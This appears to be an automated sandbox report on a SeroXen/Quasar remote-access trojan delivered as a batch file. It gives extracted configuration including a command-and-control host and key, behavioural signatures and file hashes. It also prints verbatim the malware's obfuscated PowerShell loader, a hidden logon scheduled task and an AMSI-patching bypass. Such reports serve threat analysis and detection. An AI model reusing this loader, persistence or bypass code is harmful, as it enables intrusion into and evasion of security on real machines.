Analysis
-
max time kernel
90s -
max time network
176s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
02-06-2024 14:38
Static task
static1
Behavioral task
behavioral1
Sample
$sxr-Uni.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
$sxr-Uni.bat
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
$sxr-Uni.bat
Resource
win11-20240508-en
General
-
Target
$sxr-Uni.bat
-
Size
723KB
-
MD5
beb1362e7de769ce5332ea614d48b508
-
SHA1
3b8db446968c37b66df57c21868331ae2a63d716
-
SHA256
3785896edb293ff81a5d511d761602739e712118aaf8e5e78986e389eb8cbd25
-
SHA512
8a52b4e50d49498288da73fe2b0ea12d67a0fadda4697b6adb6151cd65c33fddf3d4829d3fdda1dea56b65c7f5b7abe0bd20452ba40f7d3f2fcd4b8d69bc6830
-
SSDEEP
12288:e8vdejMeNYAAibWDLHPZyYNnOXydab+vGrtdF6YZ4J4H1EmpyL1IuHpk8:eAdeVwDLvDNOXyd0xdz4J4H1E9L1I0
Malware Config
Extracted
quasar
3.1.5
SeroXen | v3.1.5 |
runderscore00-61208.portmap.host:61208
$Sxr-jy6vh8CtEJL5ceZuIb
-
encryption_key
Q6KDujSVF3q2D64a3maQ
-
install_name
$sxr-powershell.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
3000
-
startup_key
Powershell
-
subdirectory
$sxr-seroxen2
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral3/memory/4480-78-0x00000000076B0000-0x000000000771C000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 4628 created 636 4628 powershell.EXE winlogon.exe -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 2 4480 powershell.exe 3 4480 powershell.exe 4 4480 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 1092 powershell.exe 888 powershell.exe 4480 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
Install.exeResetSurvival.exepid process 2912 Install.exe 1948 ResetSurvival.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 2 IoCs
Processes:
powershell.EXEdescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 4628 set thread context of 1364 4628 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 41 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEpid process 1092 powershell.exe 1092 powershell.exe 888 powershell.exe 888 powershell.exe 4480 powershell.exe 4480 powershell.exe 4628 powershell.EXE 4628 powershell.EXE 4628 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1092 powershell.exe Token: SeDebugPrivilege 888 powershell.exe Token: SeIncreaseQuotaPrivilege 888 powershell.exe Token: SeSecurityPrivilege 888 powershell.exe Token: SeTakeOwnershipPrivilege 888 powershell.exe Token: SeLoadDriverPrivilege 888 powershell.exe Token: SeSystemProfilePrivilege 888 powershell.exe Token: SeSystemtimePrivilege 888 powershell.exe Token: SeProfSingleProcessPrivilege 888 powershell.exe Token: SeIncBasePriorityPrivilege 888 powershell.exe Token: SeCreatePagefilePrivilege 888 powershell.exe Token: SeBackupPrivilege 888 powershell.exe Token: SeRestorePrivilege 888 powershell.exe Token: SeShutdownPrivilege 888 powershell.exe Token: SeDebugPrivilege 888 powershell.exe Token: SeSystemEnvironmentPrivilege 888 powershell.exe Token: SeRemoteShutdownPrivilege 888 powershell.exe Token: SeUndockPrivilege 888 powershell.exe Token: SeManageVolumePrivilege 888 powershell.exe Token: 33 888 powershell.exe Token: 34 888 powershell.exe Token: 35 888 powershell.exe Token: 36 888 powershell.exe Token: SeIncreaseQuotaPrivilege 888 powershell.exe Token: SeSecurityPrivilege 888 powershell.exe Token: SeTakeOwnershipPrivilege 888 powershell.exe Token: SeLoadDriverPrivilege 888 powershell.exe Token: SeSystemProfilePrivilege 888 powershell.exe Token: SeSystemtimePrivilege 888 powershell.exe Token: SeProfSingleProcessPrivilege 888 powershell.exe Token: SeIncBasePriorityPrivilege 888 powershell.exe Token: SeCreatePagefilePrivilege 888 powershell.exe Token: SeBackupPrivilege 888 powershell.exe Token: SeRestorePrivilege 888 powershell.exe Token: SeShutdownPrivilege 888 powershell.exe Token: SeDebugPrivilege 888 powershell.exe Token: SeSystemEnvironmentPrivilege 888 powershell.exe Token: SeRemoteShutdownPrivilege 888 powershell.exe Token: SeUndockPrivilege 888 powershell.exe Token: SeManageVolumePrivilege 888 powershell.exe Token: 33 888 powershell.exe Token: 34 888 powershell.exe Token: 35 888 powershell.exe Token: 36 888 powershell.exe Token: SeIncreaseQuotaPrivilege 888 powershell.exe Token: SeSecurityPrivilege 888 powershell.exe Token: SeTakeOwnershipPrivilege 888 powershell.exe Token: SeLoadDriverPrivilege 888 powershell.exe Token: SeSystemProfilePrivilege 888 powershell.exe Token: SeSystemtimePrivilege 888 powershell.exe Token: SeProfSingleProcessPrivilege 888 powershell.exe Token: SeIncBasePriorityPrivilege 888 powershell.exe Token: SeCreatePagefilePrivilege 888 powershell.exe Token: SeBackupPrivilege 888 powershell.exe Token: SeRestorePrivilege 888 powershell.exe Token: SeShutdownPrivilege 888 powershell.exe Token: SeDebugPrivilege 888 powershell.exe Token: SeSystemEnvironmentPrivilege 888 powershell.exe Token: SeRemoteShutdownPrivilege 888 powershell.exe Token: SeUndockPrivilege 888 powershell.exe Token: SeManageVolumePrivilege 888 powershell.exe Token: 33 888 powershell.exe Token: 34 888 powershell.exe Token: 35 888 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 4480 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exepowershell.EXEdescription pid process target process PID 3892 wrote to memory of 1092 3892 cmd.exe powershell.exe PID 3892 wrote to memory of 1092 3892 cmd.exe powershell.exe PID 3892 wrote to memory of 1092 3892 cmd.exe powershell.exe PID 1092 wrote to memory of 888 1092 powershell.exe powershell.exe PID 1092 wrote to memory of 888 1092 powershell.exe powershell.exe PID 1092 wrote to memory of 888 1092 powershell.exe powershell.exe PID 1092 wrote to memory of 3020 1092 powershell.exe WScript.exe PID 1092 wrote to memory of 3020 1092 powershell.exe WScript.exe PID 1092 wrote to memory of 3020 1092 powershell.exe WScript.exe PID 3020 wrote to memory of 1932 3020 WScript.exe cmd.exe PID 3020 wrote to memory of 1932 3020 WScript.exe cmd.exe PID 3020 wrote to memory of 1932 3020 WScript.exe cmd.exe PID 1932 wrote to memory of 4480 1932 cmd.exe powershell.exe PID 1932 wrote to memory of 4480 1932 cmd.exe powershell.exe PID 1932 wrote to memory of 4480 1932 cmd.exe powershell.exe PID 4480 wrote to memory of 2912 4480 powershell.exe Install.exe PID 4480 wrote to memory of 2912 4480 powershell.exe Install.exe PID 4480 wrote to memory of 2912 4480 powershell.exe Install.exe PID 4480 wrote to memory of 1948 4480 powershell.exe ResetSurvival.exe PID 4480 wrote to memory of 1948 4480 powershell.exe ResetSurvival.exe PID 4628 wrote to memory of 1364 4628 powershell.EXE dllhost.exe PID 4628 wrote to memory of 1364 4628 powershell.EXE dllhost.exe PID 4628 wrote to memory of 1364 4628 powershell.EXE dllhost.exe PID 4628 wrote to memory of 1364 4628 powershell.EXE dllhost.exe PID 4628 wrote to memory of 1364 4628 powershell.EXE dllhost.exe PID 4628 wrote to memory of 1364 4628 powershell.EXE dllhost.exe PID 4628 wrote to memory of 1364 4628 powershell.EXE dllhost.exe PID 4628 wrote to memory of 1364 4628 powershell.EXE dllhost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:636
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2ec532e8-50f2-4d2c-9dc8-de3befc93ecb}2⤵PID:1364
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7uctZMFx6G9ucHdptJcO83jS0zyXalW/JF9L2ribdis='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNOpQvTMP1KTzAKvCLgIVw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tkugM=New-Object System.IO.MemoryStream(,$param_var); $HMuDf=New-Object System.IO.MemoryStream; $ZaAiu=New-Object System.IO.Compression.GZipStream($tkugM, [IO.Compression.CompressionMode]::Decompress); $ZaAiu.CopyTo($HMuDf); $ZaAiu.Dispose(); $tkugM.Dispose(); $HMuDf.Dispose(); $HMuDf.ToArray();}function execute_function($param_var,$param2_var){ $JmmpE=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $lmGYr=$JmmpE.EntryPoint; $lmGYr.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat';$VyxHM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\$sxr-Uni.bat').Split([Environment]::NewLine);foreach ($iulyk in $VyxHM) { if ($iulyk.StartsWith(':: ')) { $qpkVJ=$iulyk.Substring(3); break; }}$payloads_var=[string[]]$qpkVJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_534_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_534.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:888 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_534.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_534.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7uctZMFx6G9ucHdptJcO83jS0zyXalW/JF9L2ribdis='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNOpQvTMP1KTzAKvCLgIVw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tkugM=New-Object System.IO.MemoryStream(,$param_var); $HMuDf=New-Object System.IO.MemoryStream; $ZaAiu=New-Object System.IO.Compression.GZipStream($tkugM, [IO.Compression.CompressionMode]::Decompress); $ZaAiu.CopyTo($HMuDf); $ZaAiu.Dispose(); $tkugM.Dispose(); $HMuDf.Dispose(); $HMuDf.ToArray();}function execute_function($param_var,$param2_var){ $JmmpE=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $lmGYr=$JmmpE.EntryPoint; $lmGYr.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_534.bat';$VyxHM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_534.bat').Split([Environment]::NewLine);foreach ($iulyk in $VyxHM) { if ($iulyk.StartsWith(':: ')) { $qpkVJ=$iulyk.Substring(3); break; }}$payloads_var=[string[]]$qpkVJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"6⤵
- Executes dropped EXE
PID:2912 -
C:\Users\Admin\AppData\Local\Temp\ResetSurvival.exe"C:\Users\Admin\AppData\Local\Temp\ResetSurvival.exe"6⤵
- Executes dropped EXE
PID:1948
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:eqLhyvyQKQWM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lnUhchXbqYKxNK,[Parameter(Position=1)][Type]$bEJVjqRfPO)$AWLerbHEZMZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+'e'+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+'T'+'y'+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,'+'A'+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+'l'+'a'+''+[Char](115)+'s',[MulticastDelegate]);$AWLerbHEZMZ.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+'i'+''+'d'+'eB'+[Char](121)+''+'S'+''+[Char](105)+'g'+[Char](44)+''+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lnUhchXbqYKxNK).SetImplementationFlags('Run'+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+'d');$AWLerbHEZMZ.DefineMethod('In'+'v'+'oke',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+'S'+'l'+''+[Char](111)+''+[Char](116)+''+','+''+'V'+'i'+'r'+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$bEJVjqRfPO,$lnUhchXbqYKxNK).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+',M'+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $AWLerbHEZMZ.CreateType();}$iEQIVOesdUwtJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+''+'3'+''+'2'+''+'.'+''+[Char](85)+'ns'+[Char](97)+'f'+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+[Char](118)+'e'+[Char](77)+''+[Char](101)+'t'+'h'+'o'+[Char](100)+'s');$JihsZkFosAGiri=$iEQIVOesdUwtJ.GetMethod(''+[Char](71)+''+[Char](101)+'tP'+[Char](114)+'oc'+'A'+''+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+'s'+'s'+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+'li'+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+'t'+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$VZBmYUsiVYJspNbztsf=eqLhyvyQKQWM @([String])([IntPtr]);$rmxeaBvRdCTsiFUehBUwkN=eqLhyvyQKQWM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MwkSrXNhCFd=$iEQIVOesdUwtJ.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+'H'+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+'el32.d'+[Char](108)+'l')));$BZPIOPGJBYfUTN=$JihsZkFosAGiri.Invoke($Null,@([Object]$MwkSrXNhCFd,[Object](''+'L'+''+[Char](111)+''+'a'+'dLib'+'r'+'a'+'r'+'y'+[Char](65)+'')));$iCNxQzqiQbTdZMeSh=$JihsZkFosAGiri.Invoke($Null,@([Object]$MwkSrXNhCFd,[Object]('V'+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+'ct')));$KJqiolX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BZPIOPGJBYfUTN,$VZBmYUsiVYJspNbztsf).Invoke(''+[Char](97)+''+'m'+'s'+[Char](105)+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$CuDzCzntjXsqEUgqY=$JihsZkFosAGiri.Invoke($Null,@([Object]$KJqiolX,[Object](''+[Char](65)+''+'m'+''+[Char](115)+'iSc'+[Char](97)+'n'+'B'+''+[Char](117)+''+[Char](102)+'fer')));$LoycvSbptd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iCNxQzqiQbTdZMeSh,$rmxeaBvRdCTsiFUehBUwkN).Invoke($CuDzCzntjXsqEUgqY,[uint32]8,4,[ref]$LoycvSbptd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$CuDzCzntjXsqEUgqY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iCNxQzqiQbTdZMeSh,$rmxeaBvRdCTsiFUehBUwkN).Invoke($CuDzCzntjXsqEUgqY,[uint32]8,0x20,[ref]$LoycvSbptd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$7'+'7'+''+'s'+''+'t'+''+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4628
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD58ba8fc1034d449222856ea8fa2531e28
SHA17570fe1788e57484c5138b6cead052fbc3366f3e
SHA2562e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2
SHA5127ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
17KB
MD51ed6ae24188d4888db6643cadfaadcb6
SHA194c2152f3a737123725fec173ccc04fcdfb38e9f
SHA256e4a02c78045555ac6d6efa12f4bab3c2fa66ff2d051e50e94fb4889745533c58
SHA51244e81f9daca5aeac0dc87dc1940f9fb58b8ae1251813584ce3708246020ad3b70281afe99660a3a9130c1dbff32bdb2c5c6a94bec7417c21f021cb60205dc7d7
-
C:\Users\Admin\AppData\Local\Temp\Install.exeFilesize
163KB
MD5051b3f7c30caf2eedbed29daa6192efb
SHA1a3e0f31e4b4367e5af06f71e7718e7d64ceb250d
SHA2566cd0c5b5b528c15ad28d9f8e44ee2b4e46d8942e8c0592e89c056a3a3661c3b3
SHA51293288a5e145ebf48fb5b536cf331159dad81c1c0458099b5cfc649fddc9a5755739cab9d46c8a3f562dba1ed7ed4852c51eaebd73e9ea8ee28f053df22c74158
-
C:\Users\Admin\AppData\Local\Temp\ResetSurvival.exeFilesize
17KB
MD55ce6714302e7247b1cb7ac7585d75601
SHA198602182b1aebe260855f8e69e919387d37150c7
SHA256321459d3f0beb05bedead51c1a31a25560e7cb0f6ccb2bb630528fe201580f55
SHA512192ef57e12fe4a794cf6f5c51a97214ecdfe49d85eae8b3c6d47e51c4a84d2cdb9146292c84aaa0f71051e0e350169a967c2c87075ebd5fbbb6ba50a6bd8400e
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ig4gfayz.daj.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
